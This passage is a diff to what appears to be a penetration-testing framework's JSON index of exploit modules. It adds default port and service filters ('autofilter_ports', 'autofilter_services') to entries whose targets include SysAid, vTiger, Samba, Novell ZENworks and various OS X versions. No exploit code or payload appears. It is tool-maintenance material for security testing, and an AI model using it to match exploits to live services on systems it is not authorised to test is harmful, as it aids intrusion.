"http", + "https" + ], "targets": [ "Struts 2" ], @@ -49628,6 +65836,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Universal", "Linux Universal", @@ -49662,6 +65885,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Universal", "Linux Universal", @@ -49701,6 +65939,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Universal", "Linux Universal", @@ -49736,6 +65989,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "stunshell" ], @@ -49769,6 +66037,21 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "stunshell / Unix", "stunshell / Windows" @@ -49802,6 +66085,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Sun Java System Web Server 7.0 update 7 on Windows x86 (SEH)", "Debug Target" @@ -49835,6 +66133,21 @@ "platform": "Linux,Windows", "arch": "x86", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "SysAid Help Desk v14.4 / Linux", @@ -49869,6 +66182,21 @@ "platform": "Java", "arch": "java", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "SysAid Help Desk v14.3 - 14.4 / Java Universal" ], @@ -49903,6 +66231,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -49936,6 +66279,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Java Windows", @@ -49982,6 +66340,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Java Universal", @@ -50029,6 +66402,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Java Universal", "Windows Universal", @@ -50065,6 +66453,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -50099,6 +66502,21 @@ "platform": "Linux", "arch": "x86", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Trend Micro Threat Discovery Appliance 2.6.1062r1" ], @@ -50132,6 +66550,21 @@ "platform": "PHP", "arch": "php", "rport": 9999, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Up.Time 7.0/7.2" ], @@ -50166,6 +66599,21 @@ "platform": "PHP", "arch": "php", "rport": 9999, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -50199,6 +66647,21 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "v0pCr3w / Unix", "v0pCr3w / Windows" @@ -50234,6 +66697,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -50270,6 +66748,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "vBulletin 5.0.X", @@ -50305,6 +66798,21 @@ "platform": "Linux,Windows", "arch": "java", "rport": 8001, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Visual Mining NetCharts Server 7.0" ], @@ -50338,6 +66846,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Vtiger 6.0.0 or older" ], @@ -50373,6 +66896,21 @@ "platform": "PHP", "arch": "php", "rport": 8888, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "vTiger CRM v6.3.0" ], @@ -50405,6 +66943,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -50445,6 +66998,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "vTigerCRM v5.4.0" ], @@ -50478,6 +67046,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "WebNMS Framework Server 5.2 / 5.2 SP1 - Linux", @@ -50513,6 +67096,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WebPageTest v2.6 or older" ], @@ -50544,6 +67142,21 @@ "platform": "Python", "arch": "python", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "werkzeug 0.10 and older" ], @@ -50578,6 +67191,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WikkaWiki 1.3.2 r1814" ], @@ -50612,6 +67240,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ninja-forms" ], @@ -50644,6 +67287,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Responsive Thumbnail Slider Plugin v1.0" ], @@ -50678,6 +67336,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)" ], @@ -50710,6 +67383,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -50745,6 +67433,21 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "zemra panel / Unix", "zemra panel / Windows" @@ -50779,6 +67482,21 @@ "platform": "Java", "arch": "java", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Novell ZCM < v11.3.2 - Universal Java" ], @@ -50815,6 +67533,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ZENworks Configuration Management 10 SP3 and 11 SP2 / Windows 2003 SP2", "ZENworks Configuration Management 10 SP3 and 11 SP2 / SUSE Linux Enterprise Server 10 SP3" @@ -50855,6 +67588,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -50894,6 +67642,12 @@ "platform": "Linux,Windows", "arch": "", "rport": 139, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal", "Redhat 8" @@ -50930,6 +67684,12 @@ "platform": "Android,Linux", "arch": "armle", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -50967,6 +67727,12 @@ "platform": "Linux,Solaris", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Solaris", @@ -51002,6 +67768,12 @@ "platform": "", "arch": "", "rport": 617, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows", "Linux" @@ -51037,6 +67809,12 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows Universal", @@ -51075,6 +67853,12 @@ "platform": "Linux,Unix,Windows", "arch": "", "rport": 4750, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows/VBS Stager", @@ -51112,6 +67896,12 @@ "platform": "Linux,Windows", "arch": "", "rport": 3333, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target", "Linux", @@ -51146,6 +67936,12 @@ "platform": "", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux 64 bits / HP Data Protector 9", "Windows 64 bits / HP Data Protector 9" @@ -51184,6 +67980,12 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 13838, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "HP VSA up to 8.5", @@ -51219,6 +68021,21 @@ "platform": "OSX,Windows", "arch": "", "rport": 12345, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Indesign CS6 Server / Windows (64 bits)", "Indesign CS6 Server / Mac OS X Snow Leopard 64 bits" @@ -51259,6 +68076,12 @@ "platform": "Linux,OSX,Windows", "arch": "armle, aarch64, x86, x64", "rport": 8000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux (Native Payload)", "OSX (Native Payload)", @@ -51295,6 +68118,114 @@ "platform": "Java", "arch": "java", "rport": null, + "autofilter_ports": [ + 999, + 1090, + 1098, + 1099, + 1100, + 1101, + 1102, + 1103, + 1129, + 1030, + 1035, + 1199, + 1234, + 1440, + 3273, + 3333, + 3900, + 2199, + 2809, + 5520, + 5580, + 5521, + 5999, + 6060, + 6789, + 6996, + 7700, + 7800, + 7878, + 7890, + 7801, + 8050, + 8051, + 8085, + 8091, + 8205, + 8303, + 8642, + 8701, + 8686, + 8888, + 8889, + 8890, + 8901, + 8902, + 8903, + 8999, + 9001, + 9003, + 9004, + 9005, + 9050, + 9090, + 9099, + 9300, + 9500, + 9711, + 9809, + 9810, + 9811, + 9812, + 9813, + 9814, + 9815, + 9875, + 9910, + 9991, + 9999, + 10001, + 10162, + 10098, + 10099, + 11001, + 11099, + 11333, + 12000, + 13013, + 14000, + 15000, + 15001, + 15200, + 16000, + 17200, + 18980, + 20000, + 23791, + 26256, + 31099, + 33000, + 32913, + 37718, + 45230, + 47001, + 47002, + 50050, + 50500, + 50501, + 50502, + 50503, + 50504 + ], + "autofilter_services": [ + "rmi", + "rmid", + "java-rmi", + "rmiregistry" + ], "targets": [ "Generic (Java Payload)" ], @@ -51328,6 +68259,114 @@ "platform": "Java,Linux,OSX,Solaris,Windows", "arch": "", "rport": 1099, + "autofilter_ports": [ + 999, + 1090, + 1098, + 1099, + 1100, + 1101, + 1102, + 1103, + 1129, + 1030, + 1035, + 1199, + 1234, + 1440, + 3273, + 3333, + 3900, + 2199, + 2809, + 5520, + 5580, + 5521, + 5999, + 6060, + 6789, + 6996, + 7700, + 7800, + 7878, + 7890, + 7801, + 8050, + 8051, + 8085, + 8091, + 8205, + 8303, + 8642, + 8701, + 8686, + 8888, + 8889, + 8890, + 8901, + 8902, + 8903, + 8999, + 9001, + 9003, + 9004, + 9005, + 9050, + 9090, + 9099, + 9300, + 9500, + 9711, + 9809, + 9810, + 9811, + 9812, + 9813, + 9814, + 9815, + 9875, + 9910, + 9991, + 9999, + 10001, + 10162, + 10098, + 10099, + 11001, + 11099, + 11333, + 12000, + 13013, + 14000, + 15000, + 15001, + 15200, + 16000, + 17200, + 18980, + 20000, + 23791, + 26256, + 31099, + 33000, + 32913, + 37718, + 45230, + 47001, + 47002, + 50050, + 50500, + 50501, + 50502, + 50503, + 50504 + ], + "autofilter_services": [ + "rmi", + "rmid", + "java-rmi", + "rmiregistry" + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -51366,6 +68405,12 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 6667, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Legend IRC Bot" ], @@ -51398,6 +68443,12 @@ "platform": "Ruby,Unix,Windows", "arch": "", "rport": 55552, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Ruby", "Windows CMD", @@ -51431,6 +68482,12 @@ "platform": "Ruby", "arch": "ruby", "rport": 55554, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -51463,6 +68520,12 @@ "platform": "", "arch": "", "rport": 5858, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "NodeJS" ], @@ -51494,6 +68557,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Apache OpenOffice on Windows (PSH)", "Apache OpenOffice on Linux/OSX (Python)" @@ -51530,6 +68599,12 @@ "platform": "Unix", "arch": "cmd", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Unix", "Windows" @@ -51562,6 +68637,12 @@ "platform": "Linux,Windows", "arch": "armle, aarch64, x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux (Bash Payload)", "Windows (Powershell Payload)" @@ -51599,6 +68680,12 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 6667, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "pbot" ], @@ -51633,6 +68720,12 @@ "platform": "Unix,Windows", "arch": "", "rport": 3465, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Client Automation 9.0.0 / Linux", "HP Client Automation 9.0.0 / Windows" @@ -51668,6 +68761,12 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 6667, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Ra1NX / Unix", "Ra1NX / Windows" @@ -51702,6 +68801,12 @@ "platform": "Linux,Unix,Windows", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -51734,6 +68839,12 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 6667, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "w3tw0rk" ], @@ -51767,6 +68878,12 @@ "platform": "", "arch": "", "rport": 7001, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Unix", "Windows" @@ -51805,6 +68922,12 @@ "platform": "Linux,OSX,Windows", "arch": "", "rport": 921, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)", @@ -51847,6 +68970,12 @@ "platform": "Linux,OSX,Windows", "arch": "", "rport": 921, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)", "wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)", @@ -51886,6 +69015,12 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 6667, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "xdh Botnet / LinuxNet perlbot" ], @@ -51919,6 +69054,12 @@ "platform": "Java", "arch": "java", "rport": 10001, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux", "Windows" @@ -51953,6 +69094,12 @@ "platform": "Linux,Windows", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows", "Linux" @@ -51988,6 +69135,12 @@ "platform": "Linux", "arch": "x86", "rport": 123, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "RedHat Linux 7.0 ntpd 4.0.99j", "RedHat Linux 7.0 ntpd 4.0.99j w/debug", @@ -52026,6 +69179,21 @@ "platform": "Linux", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Linux x86 Generic", @@ -52070,6 +69238,12 @@ "platform": "Linux,OSX,Unix,Windows", "arch": "cmd", "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], "targets": [ "Automatic" ], @@ -52102,6 +69276,21 @@ "platform": "BSD,Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Universal" ], @@ -52136,6 +69325,14 @@ "platform": "Linux", "arch": "", "rport": 139, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Samba 2.2.x Linux x86" ], @@ -52171,6 +69368,14 @@ "platform": "Unix", "arch": "cmd", "rport": 139, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic" ], @@ -52203,6 +69408,22 @@ "platform": "Linux,Windows", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux", "Windows Universal" @@ -52236,6 +69457,21 @@ "platform": "Unix,Windows", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux", "Windows x64" @@ -52270,6 +69506,21 @@ "platform": "Unix,Windows", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux", "Windows x64" @@ -52311,6 +69562,12 @@ "platform": "PHP,Python,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Python", "PHP", @@ -52347,6 +69604,12 @@ "platform": "Linux,OSX,Python", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux x86", "Linux x64", @@ -52389,6 +69652,12 @@ "platform": "BSD,Linux", "arch": "x86", "rport": 3690, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Linux Bruteforce", @@ -52428,6 +69697,12 @@ "platform": "Unix", "arch": "cmd", "rport": 1900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Supermicro Onboard IPMI (X9SCL/X9SCM) Intel SDK 1.3.1", @@ -52462,6 +69737,12 @@ "platform": "Unix,Windows", "arch": "", "rport": 5900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VNC Windows / Powershell", "VNC Windows / VBScript CMDStager", @@ -52500,6 +69781,12 @@ "platform": "", "arch": "", "rport": 655, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP x86, tinc 1.1.pre6 (exe installer)", "Windows 7 x86, tinc 1.1.pre6 (exe installer)", @@ -52547,6 +69834,12 @@ "platform": "Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XPe x86", "Wyse Linux x86" @@ -52580,6 +69873,14 @@ "platform": "Netware", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic", "VMware", @@ -52620,6 +69921,12 @@ "platform": "Netware", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "NetWare 6.5 SP2", @@ -52660,6 +69967,12 @@ "platform": "OSX", "arch": "", "rport": 548, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.3.3" ], @@ -52693,6 +70006,12 @@ "platform": "OSX", "arch": "", "rport": 617, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Arkeia 5.3.1 Stack Return (boot)" ], @@ -52729,6 +70048,12 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Firefox 3.6.16 on Mac OS X (10.6.6, 10.6.7, 10.6.8, 10.7.2 and 10.7.3)" ], @@ -52764,6 +70089,12 @@ "platform": "Java,OSX,Unix", "arch": "cmd, java", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Safari 5.1 on OS X", "Safari 5.1 on OS X with Java" @@ -52798,6 +70129,12 @@ "platform": "Unix", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -52830,6 +70167,12 @@ "platform": "OSX,Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X" ], @@ -52861,6 +70204,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X x86 (Native Payload)", "Mac OS X x64 (Native Payload)" @@ -52894,6 +70243,12 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -52930,6 +70285,18 @@ "platform": "OSX,Unix", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "Automatic", "Mail.app - Command Payloads", @@ -52967,6 +70334,13 @@ "platform": "OSX", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Mac OS X 10.3.4-10.3.6" ], @@ -53001,6 +70375,12 @@ "platform": "OSX", "arch": "", "rport": 8080, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.5.8 x86, EvoCam 3.6.6", "Mac OS X 10.5.8 x86, EvoCam 3.6.7" @@ -53036,6 +70416,12 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.10-10.10.4" ], @@ -53071,6 +70457,12 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.9.5 Mavericks x64 (Native Payload)" ], @@ -53103,6 +70495,12 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.7 Lion x64 (Native Payload)" ], @@ -53135,6 +70533,12 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X" ], @@ -53171,6 +70575,12 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.13.1 High Sierra x64 (Native Payload)" ], @@ -53207,6 +70617,12 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.9-10.10.2" ], @@ -53240,6 +70656,12 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.9-10.10.3" ], @@ -53273,6 +70695,12 @@ "platform": "OSX,Python", "arch": "x64, python", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.9.5-10.10.5" ], @@ -53308,6 +70736,12 @@ "platform": "OSX", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Tunnelblick 3.2.8 / Mac OS X x86", "Tunnelblick 3.2.8 / Mac OS X x64" @@ -53344,6 +70778,12 @@ "platform": "OSX", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Viscosity 1.4.1 / Mac OS X x86", "Viscosity 1.4.1 / Mac OS X x64" @@ -53381,6 +70821,12 @@ "platform": "OSX", "arch": "x86, x64, cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X x86 (Native Payload)", "Mac OS X x64 (Native Payload)", @@ -53415,6 +70861,12 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.10.4-10.10.5" ], @@ -53452,6 +70904,12 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.9 Mavericks x64 (Native Payload)" ], @@ -53489,6 +70947,12 @@ "platform": "OSX", "arch": "", "rport": 0, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "10.4.8 x86", "10.4.0 PPC" @@ -53523,6 +70987,12 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.5.8 x86, UFOAI 2.2.1" ], @@ -53556,6 +71026,12 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mac OS X 10.4.0 PowerPC, QuickTime 7.0.0", "Mac OS X 10.5.0 PowerPC, QuickTime 7.2.1", @@ -53593,6 +71069,14 @@ "platform": "OSX", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic", "Mac OS X 10.4.x x86 Samba 3.0.10", @@ -53631,6 +71115,14 